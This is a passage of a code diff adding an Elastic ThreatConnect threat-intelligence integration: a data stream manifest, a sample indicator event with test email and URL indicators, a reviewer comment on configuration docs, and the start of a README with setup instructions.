+++ b/packages/ti_threatconnect/data_stream/indicator/manifest.yml
@@ -0,0 +1,89 @@
+title: Collect Indicator logs from ThreatConnect.
+type: logs
+ilm_policy: logs-ti_threatconnect.indicator-default_policy
+streams:
+ - input: cel
+ title: Indicator logs
+ description: Collect Indicator logs from ThreatConnect.
+ template_path: cel.yml.hbs
+ vars:
+ - name: tql
+ type: text
+ title: TQL
+ description: Filter results based on query written in [TQL](https://knowledge.threatconnect.com/docs/threatconnect-query-language-tql).
+ multi: false
+ required: false
+ show_user: true
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: How far back to pull Indicators and the groups associated with those indicators from ThreatConnect. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 168h
+ - name: ioc_expiration_duration
+ type: text
+ title: IOC Expiration Duration
+ multi: false
+ required: true
+ show_user: true
+ default: "90d"
+ description: >-
+ Enforces all IOCs to expire after this duration. This setting is required to avoid "orphaned" IOCs that never expire. Specify [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) using only days, hours, or minutes (e.g., 10d), avoiding mixed time units.
+ - name: interval
+ type: text
+ title: Interval
+ description: Duration between requests to the ThreatConnect API. Supported units for this parameter are h/m/s.
+ default: 24h
+ multi: false
+ required: true
+ show_user: true
+ - name: batch_size
+ type: integer
+ title: Batch Size
+ description: Batch size for the response of the ThreatConnect API. The maximum supported batch size value is 10000.
+ default: 5000
+ multi: false
+ required: true
+ show_user: false
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 2m
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - threatconnect-indicator
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/ti_threatconnect/data_stream/indicator/sample_event.json b/packages/ti_threatconnect/data_stream/indicator/sample_event.json
new file mode 100644
index 00000000000..1401563c952
--- /dev/null
+++ b/packages/ti_threatconnect/data_stream/indicator/sample_event.json
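Review bot: The `enable_request_tracer` description links to the httpjson input's tracer documentation (`filebeat-input-httpjson.html#_request_tracer_filename`), but this stream is declared with `input: cel` at the top of the hunk, so the link should point to the CEL input's `resource.tracer.filename` documentation instead. The warning that tracing "compromises security" is worth keeping, since the trace files are written to the agent host with the complete requests and responses; it would be clearer to add what the operator must do afterwards, e.g. `The trace files contain the full API exchange and should be deleted once debugging is finished.` `batch_size` documents a maximum of 10000, but the `integer` var carries no bound, so an out-of-range value is presumably only rejected by the API at runtime; either say so in the description or clamp the value in `cel.yml.hbs`, which is outside this hunk.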
@@ -0,0 +1,265 @@
+{
+ "@timestamp": "2023-12-05T06:38:53.000Z",
+ "agent": {
+ "ephemeral_id": "6dfff0ee-3e69-419f-941e-9b8b053ed0a5",
+ "id": "69df163b-6251-4779-af90-125b908727c2",
+ "name": "docker-fleet-agent",
+ "type": "filebeat",
+ "version": "8.12.0"
+ },
+ "data_stream": {
+ "dataset": "ti_threatconnect.indicator",
+ "namespace": "ep",
+ "type": "logs"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "elastic_agent": {
+ "id": "69df163b-6251-4779-af90-125b908727c2",
+ "snapshot": false,
+ "version": "8.12.0"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "category": [
+ "threat"
+ ],
+ "dataset": "ti_threatconnect.indicator",
+ "id": "test.user@elastic.co",
+ "ingested": "2024-03-08T06:55:44Z",
+ "kind": "enrichment",
+ "original": "{\"active\":true,\"activeLocked\":false,\"address\":\"test.user@elastic.co\",\"associatedGroups\":{\"data\":[{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-05T06:38:33Z\",\"downVoteCount\":\"0\",\"id\":609427,\"lastModified\":\"2023-12-05T06:43:21Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427\",\"name\":\"Test2 
\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"type\":\"Vulnerability\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/609427/overview\"},{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-04T07:18:52Z\",\"documentDateAdded\":\"2023-12-04T07:18:53Z\",\"documentType\":\"PDF\",\"downVoteCount\":\"0\",\"fileName\":\"testthreatgroup.pdf\",\"fileSize\":24467,\"generatedReport\":true,\"id\":601237,\"lastModified\":\"2023-12-05T06:38:46Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/report/report.xhtml?report=601237\",\"name\":\"TestThreatGroup\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"status\":\"Success\",\"type\":\"Report\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/601237/overview\"}]},\"associatedIndicators\":{\"data\":[{\"active\":true,\"activeLocked\":false,\"address\":\"testing@poverts.com\",\"confidence\":61,\"dateAdded\":\"2023-08-25T12:57:24Z\",\"id\":891599,\"lastModified\":\"2023-12-05T06:50:06Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"rating\":3,\"summary\":\"testing@poverts.com\",\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/891599/overview\"},{\"active\":true,\"activeLocked\":false,\"dateAdded\":\"2023-08-24T06:28:17Z\",\"id\":738667,\"lastModified\":\"2023-12-05T06:47:59Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"summary\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"text\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"type\":\"URL\",\"webLink\":\"https://app.threatconnect.
com/#/details/indicators/738667/overview\"}]},\"attributes\":{},\"dateAdded\":\"2023-08-24T06:19:58Z\",\"id\":736758,\"lastModified\":\"2023-12-05T06:38:53Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"securityLabels\":{\"data\":[{\"color\":\"FFC000\",\"dateAdded\":\"2016-08-31T00:00:00Z\",\"description\":\"This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.\",\"id\":3,\"name\":\"TLP:AMBER\",\"owner\":\"System\"}]},\"summary\":\"test.user@elastic.co\",\"tags\":{\"data\":[{\"description\":\"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\",\"id\":463701,\"lastUsed\":\"2023-12-04T06:44:44Z\",\"name\":\"Financial Theft\",\"platforms\":{\"count\":6,\"data\":[\"Linux\",\"macOS\",\"Windows\",\"Office 365\",\"SaaS\",\"Google Workspace\"]},\"techniqueId\":\"T1657\"}]},\"threatAssessConfidence\":0,\"threatAssessRating\":0,\"threatAssessScore\":281,\"threatAssessScoreFalsePositive\":0,\"threatAssessScoreObserved\":0,\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/736758/overview\"}",
+ "type": [
+ "indicator"
+ ]
+ },
+ "input": {
+ "type": "cel"
+ },
+ "os": {
+ "family": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ]
+ },
+ "related": {
+ "user": [
+ "test.user",
+ "test",
+ "user",
+ "test.user@elastic.co"
+ ]
+ },
+ "tags": [
+ "preserve_original_event",
+ "forwarded",
+ "threatconnect-indicator"
+ ],
+ "threat": {
+ "indicator": {
+ "email": {
+ "address": "test.user@elastic.co"
+ },
+ "marking": {
+ "tlp": [
+ "AMBER"
+ ]
+ },
+ "provider": "ThreatConnect",
+ "reference": [
+ "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic",
+ "https://app.threatconnect.com/#/details/indicators/736758/overview"
+ ],
+ "type": [
+ "email-addr"
+ ]
+ },
+ "technique": {
+ "id": [
+ "T1657"
+ ]
+ }
+ },
+ "threat_connect": {
+ "indicator": {
+ "active": {
+ "locked": false,
+ "value": true
+ },
+ "address": "test.user@elastic.co",
+ "associated_groups": {
+ "data": [
+ {
+ "created_by": {
+ "first_name": "test",
+ "id": "69",
+ "last_name": "user",
+ "owner": "Elastic",
+ "pseudonym": "testW",
+ "user_name": "test.user@elastic.co"
+ },
+ "date_added": "2023-12-05T06:38:33.000Z",
+ "down_vote_count": "0",
+ "id": "609427",
+ "last_modified": "2023-12-05T06:43:21.000Z",
+ "legacy_link": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427",
+ "name": "Test2 ",
+ "owner": {
+ "id": "51",
+ "name": "Elastic"
+ },
+ "type": "Vulnerability",
+ "up_vote_count": "0",
+ "web_link": "https://app.threatconnect.com/#/details/groups/609427/overview"
+ },
+ {
+ "created_by": {
+ "first_name": "test",
+ "id": "69",
+ "last_name": "user",
+ "owner": "Elastic",
+ "pseudonym": "testW",
+ "user_name": "test.user@elastic.co"
+ },
+ "date_added": "2023-12-04T07:18:52.000Z",
+ "document": {
+ "date_added": "2023-12-04T07:18:53.000Z",
+ "type": "PDF"
+ },
+ "down_vote_count": "0",
+ "file": {
+ "name": "testthreatgroup.pdf",
+ "size": "24467"
+ },
+ "generated_report": true,
+ "id": "601237",
+ "last_modified": "2023-12-05T06:38:46.000Z",
+ "legacy_link": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237",
+ "name": "TestThreatGroup",
+ "owner": {
+ "id": "51",
+ "name": "Elastic"
+ },
+ "status": "Success",
+ "type": "Report",
+ "up_vote_count": "0",
+ "web_link": "https://app.threatconnect.com/#/details/groups/601237/overview"
+ }
+ ]
+ },
+ "associated_indicators": {
+ "data": [
+ {
+ 
"active": {
+ "locked": false,
+ "value": true
+ },
+ "address": "testing@poverts.com",
+ "confidence": 61,
+ "date_added": "2023-08-25T12:57:24.000Z",
+ "id": "891599",
+ "last_modified": "2023-12-05T06:50:06.000Z",
+ "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic",
+ "owner": {
+ "id": "51",
+ "name": "Elastic"
+ },
+ "private_flag": false,
+ "rating": 3,
+ "summary": "testing@poverts.com",
+ "type": "EmailAddress",
+ "web_link": "https://app.threatconnect.com/#/details/indicators/891599/overview"
+ },
+ {
+ "active": {
+ "locked": false,
+ "value": true
+ },
+ "date_added": "2023-08-24T06:28:17.000Z",
+ "id": "738667",
+ "last_modified": "2023-12-05T06:47:59.000Z",
+ "legacy_link": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic",
+ "owner": {
+ "id": "51",
+ "name": "Elastic"
+ },
+ "private_flag": false,
+ "summary": "http://www.testingmcafeesites.com/testcat_pc.html",
+ "text": "http://www.testingmcafeesites.com/testcat_pc.html",
+ "type": "URL",
+ "web_link": "https://app.threatconnect.com/#/details/indicators/738667/overview"
+ }
+ ]
+ },
+ "date_added": "2023-08-24T06:19:58.000Z",
+ "deleted_at": "2024-03-04T06:38:53.000Z",
+ "expiration_duration": "90d",
+ "id": "736758",
+ "last_modified": "2023-12-05T06:38:53.000Z",
+ "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic",
+ "owner": {
+ "id": "51",
+ "name": "Elastic"
+ },
+ "private_flag": false,
+ "security_labels": {
+ "data": [
+ {
+ "color": "FFC000",
+ "date_added": "2016-08-31T00:00:00.000Z",
+ "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. 
Information with this label can be shared with members of an organization and its clients.",
+ "id": "3",
+ "name": "TLP:AMBER",
+ "owner": "System"
+ }
+ ]
+ },
+ "summary": "test.user@elastic.co",
+ "tags": {
+ "data": [
+ {
+ "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)",
+ "id": "463701",
+ "last_used": "2023-12-04T06:44:44.000Z",
+ "name": "Financial Theft",
+ "platforms": {
+ "count": 6,
+ "data": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ]
+ },
+ "technique": {
+ "id": "T1657"
+ }
+ }
+ ]
+ },
+ "threat_assess": {
+ "confidence": 0,
+ "rating": 0,
+ "score": {
+ "false_positive": 0,
+ "observed": 0,
+ "value": 281
+ }
+ },
+ "type": "EmailAddress",
+ "web_link": "https://app.threatconnect.com/#/details/indicators/736758/overview"
+ }
+ },
+ "user": {
+ "domain": "elastic.co",
+ "email": "test.user@elastic.co",
+ "name": "test.user"
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_threatconnect/docs/README.md b/packages/ti_threatconnect/docs/README.md
new file mode 100644
index 00000000000..72552f9a39e
--- /dev/null
+++ b/packages/ti_threatconnect/docs/README.md
@@ -0,0 +1,545 @@ +# ThreatConnect + +ThreatConnect is a widely used Threat Intelligence Platform (TIP) designed to assist organizations in aggregating, analyzing, and sharing information related to cybersecurity threats. The platform provides tools and features that enable security teams to collaborate on threat intelligence, manage incidents, and make informed decisions to enhance their overall cybersecurity posture. This ThreatConnect integration enables you to consume and analyze ThreatConnect data within Elastic Security, including indicator events, providing you with visibility and context for your cloud environments within Elastic Security. + +## Data streams + +The ThreatConnect integration collects a single type of data: Indicator. + +**Indicator** is used to retrieve atomic piece of information that has some intelligence value via the [ThreatConnect](https://docs.threatconnect.com/en/latest/rest_api/v3/indicators/indicators.html) + +Reference for [REST APIs](https://docs.threatconnect.com/en/latest/rest_api/rest_api.html#getting-started) of ThreatConnect. + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. 
This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. +This module has been tested against the **ThreatConnect API Version v3**. +The minimum required ThreatConnect Platform version needs to be **7.3.1**. + +## Setup + +### To collect data from ThreatConnect, the following parameters from your ThreatConnect instance are required: + +1. Access Id +2. Secret Key +3. URL + +To create an API user account, please refer to [this](https://knowledge.threatconnect.com/docs/creating-user-accounts) article. + +### Enabling the integration in Elastic: +1. In Kibana, go to Management > Integrations. +2. In the "Search for integrations" search bar, type ThreatConnect. +3. Click on the "ThreatConnect" integration from the search results. +4. Click on the "Add ThreatConnect" button to add the integration. +5. Configure all required integration parameters, including Access Id, Secret Key, and URL, to enable data collection from the ThreatConnect REST API. +6. Save the integration. + +## Indicators Expiration + +The ingested indicators expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active indicators be available to the end users. 
Since we want to retain only valuable information and avoid duplicated data, the ThreatConnect Elastic integration forces the intel indicators to rotate into a custom index called: `logs-ti_threatconnect_latest.dest_indicator-*`. +**Please, refer to this index in order to set alerts and so on.** + +#### Handling Orphaned Indicators + +Some ThreatConnect indicators may never expire and will continue to stay in the latest destination index. To avoid any false positives from such orphaned indicators, users are allowed to configure `IOC Expiration Duration` parameter while setting up the integration. This parameter deletes all data inside the destination index `logs-ti_threatconnect_latest.dest_indicator` after this specified duration is reached. Users must pull entire feed instead of incremental feed when this expiration happens so that the indicators get reset. + +### How it works + +This is possible thanks to a transform rule installed along with the integration. The transform rule parses the data stream content that is pulled from ThreatConnect and only adds new indicators. + +Both the data stream and the latest index have applied expiration through ILM and a retention policy in the transform respectively. + +## Logs Reference + +### Indicator + +This is the `Indicator` dataset. 
+ +#### Example + +An example event for `indicator` looks as following: + +```json +{ + "@timestamp": "2023-12-05T06:38:53.000Z", + "agent": { + "ephemeral_id": "6dfff0ee-3e69-419f-941e-9b8b053ed0a5", + "id": "69df163b-6251-4779-af90-125b908727c2", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "data_stream": { + "dataset": "ti_threatconnect.indicator", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "69df163b-6251-4779-af90-125b908727c2", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "dataset": "ti_threatconnect.indicator", + "id": "test.user@elastic.co", + "ingested": "2024-03-08T06:55:44Z", + "kind": "enrichment", + "original": "{\"active\":true,\"activeLocked\":false,\"address\":\"test.user@elastic.co\",\"associatedGroups\":{\"data\":[{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-05T06:38:33Z\",\"downVoteCount\":\"0\",\"id\":609427,\"lastModified\":\"2023-12-05T06:43:21Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427\",\"name\":\"Test2 
\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"type\":\"Vulnerability\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/609427/overview\"},{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-04T07:18:52Z\",\"documentDateAdded\":\"2023-12-04T07:18:53Z\",\"documentType\":\"PDF\",\"downVoteCount\":\"0\",\"fileName\":\"testthreatgroup.pdf\",\"fileSize\":24467,\"generatedReport\":true,\"id\":601237,\"lastModified\":\"2023-12-05T06:38:46Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/report/report.xhtml?report=601237\",\"name\":\"TestThreatGroup\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"status\":\"Success\",\"type\":\"Report\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/601237/overview\"}]},\"associatedIndicators\":{\"data\":[{\"active\":true,\"activeLocked\":false,\"address\":\"testing@poverts.com\",\"confidence\":61,\"dateAdded\":\"2023-08-25T12:57:24Z\",\"id\":891599,\"lastModified\":\"2023-12-05T06:50:06Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"rating\":3,\"summary\":\"testing@poverts.com\",\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/891599/overview\"},{\"active\":true,\"activeLocked\":false,\"dateAdded\":\"2023-08-24T06:28:17Z\",\"id\":738667,\"lastModified\":\"2023-12-05T06:47:59Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"summary\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"text\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"type\":\"URL\",\"webLink\":\"https://app.threatconnect.
com/#/details/indicators/738667/overview\"}]},\"attributes\":{},\"dateAdded\":\"2023-08-24T06:19:58Z\",\"id\":736758,\"lastModified\":\"2023-12-05T06:38:53Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"securityLabels\":{\"data\":[{\"color\":\"FFC000\",\"dateAdded\":\"2016-08-31T00:00:00Z\",\"description\":\"This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.\",\"id\":3,\"name\":\"TLP:AMBER\",\"owner\":\"System\"}]},\"summary\":\"test.user@elastic.co\",\"tags\":{\"data\":[{\"description\":\"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\",\"id\":463701,\"lastUsed\":\"2023-12-04T06:44:44Z\",\"name\":\"Financial Theft\",\"platforms\":{\"count\":6,\"data\":[\"Linux\",\"macOS\",\"Windows\",\"Office 365\",\"SaaS\",\"Google Workspace\"]},\"techniqueId\":\"T1657\"}]},\"threatAssessConfidence\":0,\"threatAssessRating\":0,\"threatAssessScore\":281,\"threatAssessScoreFalsePositive\":0,\"threatAssessScoreObserved\":0,\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/736758/overview\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "cel" + }, + "os": { + "family": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "related": { + "user": [ + "test.user", + "test", + "user", + "test.user@elastic.co" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "threatconnect-indicator" + ], + "threat": { + "indicator": { + "email": { + "address": "test.user@elastic.co" + }, + "marking": { + "tlp": [ + "AMBER" 
+ ] + }, + "provider": "ThreatConnect", + "reference": [ + "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "https://app.threatconnect.com/#/details/indicators/736758/overview" + ], + "type": [ + "email-addr" + ] + }, + "technique": { + "id": [ + "T1657" + ] + } + }, + "threat_connect": { + "indicator": { + "active": { + "locked": false, + "value": true + }, + "address": "test.user@elastic.co", + "associated_groups": { + "data": [ + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-05T06:38:33.000Z", + "down_vote_count": "0", + "id": "609427", + "last_modified": "2023-12-05T06:43:21.000Z", + "legacy_link": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427", + "name": "Test2 ", + "owner": { + "id": "51", + "name": "Elastic" + }, + "type": "Vulnerability", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/609427/overview" + }, + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-04T07:18:52.000Z", + "document": { + "date_added": "2023-12-04T07:18:53.000Z", + "type": "PDF" + }, + "down_vote_count": "0", + "file": { + "name": "testthreatgroup.pdf", + "size": "24467" + }, + "generated_report": true, + "id": "601237", + "last_modified": "2023-12-05T06:38:46.000Z", + "legacy_link": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237", + "name": "TestThreatGroup", + "owner": { + "id": "51", + "name": "Elastic" + }, + "status": "Success", + "type": "Report", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/601237/overview" + } + ] + }, + "associated_indicators": { + "data": [ + { + 
